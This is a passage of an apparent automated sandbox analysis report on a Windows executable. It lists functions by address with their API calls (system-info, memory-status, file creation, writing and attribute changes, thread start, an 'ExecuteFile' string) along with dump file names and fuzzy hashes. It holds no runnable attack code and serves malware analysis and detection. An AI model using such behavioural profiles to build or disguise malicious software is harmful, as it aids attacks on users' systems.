                                                                              • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                              • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                            • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                            • String ID:
                                                                            • API String ID: 1642057587-0
                                                                            • Opcode ID: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                            • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                                            • Opcode Fuzzy Hash: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                            • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                            Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002D,0000002D,?,00406616,?,00419810,00419810), ref: 00401739
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                              • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                              • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                              • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                              • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                            • String ID: ExecuteFile
                                                                            • API String ID: 1306139538-323923146
                                                                            • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                            • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                                            • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                            • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                            Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                            • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memmove
                                                                            • String ID:
                                                                            • API String ID: 3828600508-0
                                                                            • Opcode ID: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                            • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                            • Opcode Fuzzy Hash: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                            • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                            Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID: @
                                                                            • API String ID: 1890195054-2766056989
                                                                            • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                            • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                            • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                            • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                            Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: lA
                                                                            • API String ID: 613200358-262130271
                                                                            • Opcode ID: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                            • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                            • Opcode Fuzzy Hash: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                            • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                            Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@H_prolog
                                                                            • String ID:
                                                                            • API String ID: 1329742358-0
                                                                            • Opcode ID: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                            • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                            • Opcode Fuzzy Hash: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                            • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                            Function 00401172 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            • Opcode ID: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                            • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                                            • Opcode Fuzzy Hash: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                            • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                                            Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            • Opcode ID: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                            • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                            • Opcode Fuzzy Hash: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                            • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                            Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                            • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                            • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                            • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                            Function 0040269A Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                            • Instruction ID: 6a7e44d1361fbcc4c06fb61f3001a61fff325a62d5d84498b6a11b5e2c7c739c
                                                                            • Opcode Fuzzy Hash: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                            • Instruction Fuzzy Hash: BBB0923280C260AEBA3A3E15F9038C967D5EF1023A321856FF089112656E972D92668C
                                                                            Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                            • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                            • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                            • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                            Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                            • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                            • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                            • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                            Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                            • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                            • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                            • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                            Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle
                                                                            • String ID:
                                                                            • API String ID: 3498533004-0
                                                                            • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                            • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                            • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                            • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                            Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                            • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                            • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                            • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                            Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: _beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3014514943-0
                                                                            • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                            • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                            • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                            • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                            Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                            • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                            • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                            • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                            Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                            • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
